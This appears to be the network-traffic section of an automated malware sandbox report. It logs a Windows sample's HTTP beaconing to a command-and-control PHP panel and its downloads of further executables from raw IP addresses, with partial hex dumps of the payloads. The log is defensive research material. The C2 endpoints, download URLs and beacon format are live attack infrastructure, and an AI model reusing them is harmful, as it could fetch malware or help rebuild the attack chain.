                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.968178988 CET1236INData Raw: 40 1b 4a eb 32 76 5f d3 fb 39 60 50 11 2c ac 7f 75 d5 41 17 9a ba 9a a5 65 e4 39 e7 ee 7b 3f e7 8d d7 54 c2 a5 72 c0 54 8a a5 b2 41 0c fc b8 f8 a6 99 6c 72 12 a8 98 67 28 3b fc fc c1 a9 30 6d fe 11 b8 f9 56 53 85 81 29 cb 26 d1 c8 94 83 58 a5 3c
                                                                                                                                                                                                                                            Data Ascii: @J2v_9`P,uAe9{?TrTAlrg(;0mVS)&X<V\/Z~_Jp;JOU6VQ9_n-\jsk7rixa#vyC\<7ws583v=w,"Zf`>]6%""4Y8}p+[a
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.968332052 CET1120INData Raw: 2b 67 00 6f 36 93 8b 8f 53 25 a3 ee f6 cc 1a d2 6d 3a a3 c7 1f 80 c8 43 65 da 7d 01 a3 c8 c6 08 e5 c2 f8 af 3d 9e 77 c1 ae 46 51 3f 02 02 8d 16 23 36 00 5e 2a 1d fc e1 36 a7 cc 4b 30 26 1d 8f 5f 45 f5 89 69 ff aa 98 7d 6d 1c a5 a0 d0 73 f1 10 df
                                                                                                                                                                                                                                            Data Ascii: +go6S%m:Ce}=wFQ?#6^*6K0&_Ei}ms' 0u't0h[9wBN:DG*T;^WbIYzFs=fu.itu C{`94gkda6U#VoTT<{T
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:47.619965076 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.114501953 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:47 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.380223989 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:50.872679949 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:50 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.188770056 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.679863930 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:53 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:55.904158115 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.394156933 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:56 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.711106062 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:59.201051950 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:58 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:01.281349897 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:01.765575886 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:01 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:03.969897985 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:04.461757898 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:04 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:06.486721039 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:06.978317022 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:06 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:09.001329899 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:09.490350008 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:09 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:11.551137924 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                            Host: 80.82.65.70
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:12.037952900 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:11 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            13192.168.2.649965185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.946995020 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 33 35 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                            Data Ascii: d1=1013513001&unit=246122658369
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.316210032 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            14192.168.2.649969185.215.113.16805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:48.437544107 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776118994 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:49 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 2793472
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 20:04:25 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "67574d49-2aa000"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 47 78 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+Gx+`Ui` @ @.rsrc`2@.idata 8@ixnajgom@*>*:@seyuqqyf *x*@.taggant@+"~*@
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776176929 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776190996 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776397943 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776416063 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776428938 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776439905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.776452065 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.777093887 CET1236INData Raw: 55 fd dc 26 8e 5a bc ac 4b 78 52 24 3e 6b f5 fb 82 5a b9 8c eb 87 2b ac 4b 78 52 96 3c 6f f5 ab 7e 5a df 2a 5c 2b 76 34 2d af d6 c3 1e 80 57 4a 3d 73 40 ad db 5a 6f 34 29 49 d9 7c e3 6c 8c 79 46 15 d3 2b 9e 84 53 04 5e 91 dd 01 7d 75 76 b0 ac 57
                                                                                                                                                                                                                                            Data Ascii: U&ZKxR$>kZ+KxR<o~Z*\+v4-WJ=s@Zo4)I|lyF+S^}uvWQl<$Xy.eeju3l|~ .%`3Qf$F2\7GqJH!^]bgV@HLYPteHQY%jCYBjCF`H#Ie!M2IykX
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.777113914 CET1236INData Raw: 14 6d bf 47 39 7f 20 35 d5 9f e0 5d b4 a0 5a 08 e5 a9 0a 3e cd 19 05 78 93 a8 e1 1c 56 37 12 ce 44 4d c7 bc 49 c5 1c d6 4d db a2 5c 67 cc f9 7e dc f9 13 f3 83 fc fa 7c 9c 58 68 65 56 a1 68 e2 9a 50 ce 72 56 e4 08 b9 fa 9b ea f9 73 db 13 2b 8a 50
                                                                                                                                                                                                                                            Data Ascii: mG9 5]Z>xV7DMIM\g~|XheVhPrVs+Pd'%NqqKayFgzQHKOwT:@jITF~E;CB`HAA~$/H?Q35d\Ne) G
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:49.895571947 CET1236INData Raw: 8c e1 e7 c2 ce 81 8d 5a 92 c1 ed 47 81 61 32 29 6d 10 80 8e 7c 5d 38 45 8f ca f0 bc 9a a1 f6 8c 52 c8 20 36 b0 a5 a5 e9 65 ae 04 52 83 1a 52 e8 90 77 3d 0c a7 b4 1f f5 63 95 11 f2 d5 32 66 53 6e 24 9d ca ae 0e 9b 45 ce e5 07 0b 8e b9 71 40 a8 a5
                                                                                                                                                                                                                                            Data Ascii: ZGa2)m|]8ER 6eRRw=c2fSn$Eq@@hR|TvLQ~jZMcrtp~T}x A-63{k`4ZHe"-P5a{)ZZ+l Vjau J:pS\a\p-uo+&`f


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            15192.168.2.650000185.215.113.16805440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:55.633801937 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.981374979 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:56 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 2793472
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 20:04:27 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "67574d4b-2aa000"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 47 78 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+Gx+`Ui` @ @.rsrc`2@.idata 8@ixnajgom@*>*:@seyuqqyf *x*@.taggant@+"~*@
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.981391907 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.984622955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.984713078 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.984724045 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
